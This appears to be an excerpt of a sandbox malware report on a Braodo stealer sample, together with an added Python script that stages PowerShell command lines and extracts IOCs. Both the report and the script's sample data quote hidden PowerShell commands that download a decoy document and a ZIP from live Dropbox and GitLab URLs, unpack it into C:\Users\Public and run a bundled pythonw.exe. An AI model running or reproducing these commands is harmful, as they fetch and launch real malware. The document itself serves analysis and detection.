                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
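                  The five process-creation entries above are the whole delivery chain as the sandbox recorded it: a hidden PowerShell fetches a decoy .docx from Dropbox and opens it for the victim, a second fetch pulls a ZIP from a GitLab raw URL into C:\Users\Public, ZipFile::ExtractToDirectory unpacks it, and the bundled pythonw.exe is launched with a file that does not carry a .py extension. The following Python is an added example and is not code from the Joe Sandbox report or from the Braodo sample. It classifies command lines of this kind into stages and extracts their URLs and dropped paths; SAMPLE_CMDLINES is a constructed list copied from the entries above, and the stage names, regexes and the LOADER_CHAIN definition are this example's own choices, not labels the report uses.

```python
"""Added example (not Joe Sandbox or Braodo code): stage PowerShell command
lines from a process-creation log and pull out network and file IOCs.
SAMPLE_CMDLINES is copied from the report entries; the stage labels are ours.
"""
import re
from dataclasses import dataclass

# Constructed sample: the five command lines recorded in the report, verbatim.
SAMPLE_CMDLINES = [
    r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"''',
    r'''powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"''',
    r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"''',
    r'''powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"''',
    r'''powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"''',
]

# One regex per stage; dict order is the order stages are reported in.
RULES = {
    # .NET and cmdlet downloaders typically driven from a .bat stager
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    # -WindowStyle Hidden and its prefix abbreviations (-w hidden, -win hidden)
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    # a document opened so the victim sees something benign
    "decoy_open": re.compile(r"Start-Process\s+'[^']+\.(?:docx?|pdf|xlsx?)'", re.I),
    "archive_extract": re.compile(r"ZipFile\]::ExtractToDirectory|Expand-Archive", re.I),
    # any .exe launched from the world-writable C:\Users\Public tree
    "public_dir_exec": re.compile(r"C:[\\/]Users[\\/]Public[\\/]\S*\.exe\b", re.I),
    # heuristic: a python interpreter handed a script whose extension is not .py
    "interpreter_odd_ext": re.compile(r"pythonw?\.exe\s+\S+\.(?!py\b)[A-Za-z0-9]+", re.I),
}
# Our definition of the loader pattern: fetch, unpack, run from Public.
LOADER_CHAIN = {"download", "archive_extract", "public_dir_exec"}

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Drive-letter paths; the lookbehind stops the "s:/" of https:// from matching.
WIN_PATH_RE = re.compile(r"(?<![A-Za-z])[A-Za-z]:[\\/][^\s'\"]+")


@dataclass
class Finding:
    cmdline: str
    stages: list
    urls: list
    paths: list


def normalize_path(p: str) -> str:
    """Unify slash style and collapse doubled backslashes (as in the Temp path)."""
    return re.sub(r"\\+", r"\\", p.replace("/", "\\"))


def classify(cmdline: str) -> Finding:
    """Tag one command line with every stage rule it matches and list its IOCs."""
    stages = [name for name, rx in RULES.items() if rx.search(cmdline)]
    urls = URL_RE.findall(cmdline)
    paths = [normalize_path(p) for p in WIN_PATH_RE.findall(cmdline)]
    return Finding(cmdline, stages, urls, paths)


def analyze_chain(cmdlines):
    """Classify a set of command lines (for example all children of one cmd.exe)
    and decide whether the fetch -> unpack -> run-from-Public chain is present."""
    findings = [classify(c) for c in cmdlines]
    stages = {s for f in findings for s in f.stages}
    return {
        "findings": findings,
        "stages": stages,
        "urls": sorted({u for f in findings for u in f.urls}),
        "paths": sorted({p for f in findings for p in f.paths}),
        "loader_chain": LOADER_CHAIN <= stages,
    }


if __name__ == "__main__":
    report = analyze_chain(SAMPLE_CMDLINES)
    for f in report["findings"]:
        print(f"{', '.join(f.stages) or '-':45} {f.cmdline[:60]}...")
    print("URLs:", *report["urls"], sep="\n  ")
    print("Dropped paths:", *report["paths"], sep="\n  ")
    print("Full loader chain:", report["loader_chain"])
```

                  Run against Sysmon event 1 or EDR process-creation records grouped by parent cmd.exe, the `loader_chain` flag fires only when all three fetch, unpack and run stages appear in the same group, which keeps a lone DownloadFile from a legitimate admin script below the alerting bar while the URL and path lists still give the responder the hosts to block and the files to collect.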
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD344D00BD pushad ; iretd 12_2_00007FFD344D00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD344D285F push esp; retf 12_2_00007FFD344D2862
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD344D7047 push esp; retf 12_2_00007FFD344D7048
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFD344C00BD pushad ; iretd 14_2_00007FFD344C00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFD344C2837 push esp; retf 14_2_00007FFD344C283A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFD344C7047 push esp; retf 14_2_00007FFD344C7048
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD344D00BD pushad ; iretd 16_2_00007FFD344D00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD344D27F7 push esp; retf 16_2_00007FFD344D27FA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD345A23EC push 8B485F93h; iretd 16_2_00007FFD345A23F1

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3475Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6425Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4019Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2806Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5807Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3974Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4221Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2508Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3629Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 3475 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 6425 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep count: 4019 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep count: 2806 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep count: 5807 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep count: 3974 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 4221 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 2508 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep count: 3629 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep count: 86 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV0T
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
